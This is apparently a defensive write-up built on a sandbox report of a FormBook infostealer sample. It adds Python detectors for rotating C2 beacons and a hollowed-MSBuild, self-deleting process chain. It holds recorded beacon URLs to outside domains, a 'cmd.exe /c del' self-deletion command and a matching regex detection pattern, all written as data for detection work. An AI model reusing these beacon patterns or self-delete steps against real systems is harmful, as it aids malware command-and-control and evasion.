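# (session id, process image, Host header, request target, response status or None)
SESSIONS = [
    (4, r"C:\Windows\explorer.exe", "www.pasumaisangam.com",
     "/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0", 301),
    (5, r"C:\Windows\explorer.exe", "www.justsoldbykristen.com",
     "/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0", 301),
    (6, r"C:\Windows\explorer.exe", "www.lotoencasa.com",
     "/igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0", 200),
    (7, r"C:\Windows\explorer.exe", "www.guidesgold.net",
     "/igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0", 302),
    (8, r"C:\Windows\explorer.exe", "www.thoughtslate.com",
     "/igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0", None),
    (9, r"C:\Windows\explorer.exe", "www.chemtradent.com",
     "/igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0", 302),
    # Constructed benign control: a browser fetching two pages from one site.
    (10, r"C:\Program Files\Mozilla Firefox\firefox.exe", "www.example.com", "/index.html", 200),
    (11, r"C:\Program Files\Mozilla Firefox\firefox.exe", "www.example.com", "/search?q=invoice", 200),
]

# Assumed list of processes that should not originate HTTP on their own; a beacon
# from one of them is the report's "System process connects to network" case.
NON_NETWORK_PROCESSES = {"explorer.exe"}


def split_query(target):
    """Return (path, [(name, raw value), ...]) for a request target.
    Values are kept raw (no '+'/percent decoding): the first FormBook
    parameter is opaque data and must be compared byte for byte."""
    parts = urlsplit(target)
    pairs = []
    for item in parts.query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return parts.path, pairs


def find_rotating_beacons(sessions, min_hosts=3):
    """Group requests by (process, path, name, value). A pair that is identical
    across >= min_hosts distinct Host headers is the fixed part of a beacon
    that rotates through domains; the per-request parameter never repeats,
    so it never forms a group."""
    hosts = defaultdict(set)
    sids = defaultdict(list)
    for sid, proc, host, target, _status in sessions:
        path, pairs = split_query(target)
        for name, value in pairs:
            key = (proc, path, name, value)
            hosts[key].add(host)
            sids[key].append(sid)
    findings = []
    for key, seen in hosts.items():
        if len(seen) < min_hosts:
            continue
        proc, path, name, value = key
        findings.append({
            "process": proc,
            "from_system_process": ntpath.basename(proc).lower() in NON_NETWORK_PROCESSES,
            "path": path,
            "static_param": f"{name}={value}",
            "hosts": sorted(seen),
            "sessions": sorted(sids[key]),
        })
    return findings


def response_summary(sessions, finding):
    """Map each host in a finding to the status the sandbox recorded. Hosts that
    answer 200 are the ones to look at first; redirects and silence are what the
    decoy domains in the list produce."""
    wanted = set(finding["sessions"])
    return {host: status for sid, _p, host, _t, status in sessions if sid in wanted}


if __name__ == "__main__":
    for f in find_rotating_beacons(SESSIONS):
        print(f["process"], f["path"], f["static_param"], len(f["hosts"]), "hosts")
        print(response_summary(SESSIONS, f))
```

On the report's data the only cluster is `/igqu/` with `JXhpvv=OXXTgtL8CzU0PRx0` across six hosts from explorer.exe; the browser control produces none. The threshold of three distinct hosts per fixed parameter is an assumption chosen to stay quiet on ordinary sites that pass a tracking id to one or two domains.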


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior


                                                                                System Behavior

                                                                                General

                                                                                Start time: 09:22:33
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                                Wow64 process (32bit): true
                                                                                Commandline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                                Imagebase: 0x7ffa9b7e0000
                                                                                File size: 1269760 bytes
                                                                                MD5 hash: BA4F1B472CB69D8A3924D88DACF1B833
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: .Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation: low

                                                                                General

                                                                                Start time: 09:22:36
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                Wow64 process (32bit): true
                                                                                Commandline: {path}
                                                                                Imagebase: 0xac0000
                                                                                File size: 261728 bytes
                                                                                MD5 hash: D621FD77BD585874F9686D3A76462EF1
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation: moderate

                                                                                General

                                                                                Start time: 09:22:38
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Windows\explorer.exe
                                                                                Wow64 process (32bit): false
                                                                                Commandline:
                                                                                Imagebase: 0x7ff693d90000
                                                                                File size: 3933184 bytes
                                                                                MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Reputation: high

                                                                                General

                                                                                Start time: 09:22:47
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Windows\SysWOW64\raserver.exe
                                                                                Wow64 process (32bit): true
                                                                                Commandline: C:\Windows\SysWOW64\raserver.exe
                                                                                Imagebase: 0xcc0000
                                                                                File size: 108544 bytes
                                                                                MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation: moderate

                                                                                General

                                                                                Start time: 09:22:51
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit): true
                                                                                Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                                                                                Imagebase: 0x150000
                                                                                File size: 232960 bytes
                                                                                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Reputation: high

                                                                                General

                                                                                Start time: 09:22:52
                                                                                Start date: 21/11/2020
                                                                                Path: C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit): false
                                                                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase: 0x7ff7ecfc0000
                                                                                File size: 625664 bytes
                                                                                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Reputation: high
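
The process list above is the classic FormBook chain: the .NET dropper starts MSBuild.exe with a command line the report shows only as {path} (which I read as the bare executable path, no project or switches), FormBook code is then found in MSBuild's memory, explorer.exe starts a SysWOW64 binary (raserver.exe) that also carries FormBook in memory, and that binary runs cmd.exe /c del against the MSBuild.exe host. The following is an added example, not part of the report and not the sample's code: two detections over Sysmon-style process-create events, one for MSBuild launched without anything to build by a non-build parent, one for a cmd.exe /c del of an executable whose grandparent is explorer.exe. The PIDs and parent links are assumed (the report gives start times, paths and command lines but no PIDs), the BUILD_PARENTS allow-list is mine, and the devenv.exe/MSBuild.exe pair is a constructed benign control.

```python
"""Added example: flag the FormBook process chain from process-create events.
Not from the sandbox report or the FormBook sample."""
import ntpath
import re

# Constructed from the System Behavior entries above. PIDs and parent links
# are assumed for illustration; the last two events are a constructed benign
# control (Visual Studio building a project), not report data.
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 2001, "ppid": 1000, "image": r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe",
     "cmdline": r"'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'"},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 2003, "ppid": 1000, "image": r"C:\Windows\SysWOW64\raserver.exe",
     "cmdline": r"C:\Windows\SysWOW64\raserver.exe"},
    {"pid": 2004, "ppid": 2003, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'"},
    {"pid": 2005, "ppid": 2004, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 3001, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 3002, "ppid": 3001, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

# Assumed allow-list of parents that legitimately start MSBuild.exe.
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
# cmd.exe /c del <path ending in .exe>, with or without quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?\.exe)['"]?""", re.IGNORECASE)


def base(path):
    return ntpath.basename(path).lower()


def by_pid(events):
    return {e["pid"]: e for e in events}


def ancestors(index, pid):
    """Walk parent links upward until a PID is not in the event set."""
    chain = []
    while pid in index:
        chain.append(index[pid])
        pid = index[pid]["ppid"]
    return chain


def hollowed_msbuild_candidates(events):
    """MSBuild.exe started with nothing but its own path (or an empty command
    line) by a parent that is not a build tool: a hollowing host with nothing
    to build, which is what the report shows for the dropper's child."""
    index = by_pid(events)
    hits = []
    for e in events:
        if base(e["image"]) != "msbuild.exe":
            continue
        args = e["cmdline"].strip().strip("'\"")
        no_args = args == "" or args.lower() == e["image"].lower()
        parent = index.get(e["ppid"])
        trusted_parent = parent is not None and base(parent["image"]) in BUILD_PARENTS
        if no_args and not trusted_parent:
            hits.append(e["pid"])
    return hits


def self_delete_chains(events):
    """cmd.exe /c del <x.exe> whose grandparent is explorer.exe, i.e. the shape
    explorer.exe -> injected system binary -> cmd.exe seen in the report."""
    index = by_pid(events)
    hits = []
    for e in events:
        if base(e["image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        chain = [base(a["image"]) for a in ancestors(index, e["ppid"])]
        if len(chain) >= 2 and chain[1] == "explorer.exe":
            hits.append({"pid": e["pid"], "deleted": m.group("target"), "chain": chain[:2]})
    return hits


if __name__ == "__main__":
    print("hollowed MSBuild candidates:", hollowed_msbuild_candidates(EVENTS))
    for hit in self_delete_chains(EVENTS):
        print("self-delete:", hit)
```

On the constructed events the first rule returns only the dropper's MSBuild child (pid 2002), not the Visual Studio build, and the second returns the single cmd.exe whose chain is raserver.exe under explorer.exe, with the deleted path being the MSBuild.exe host. The second rule deliberately keys on the grandparent rather than on raserver.exe by name, because FormBook picks its SysWOW64 host from a list and the binary differs between runs.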

                                                                                Disassembly

                                                                                Code Analysis
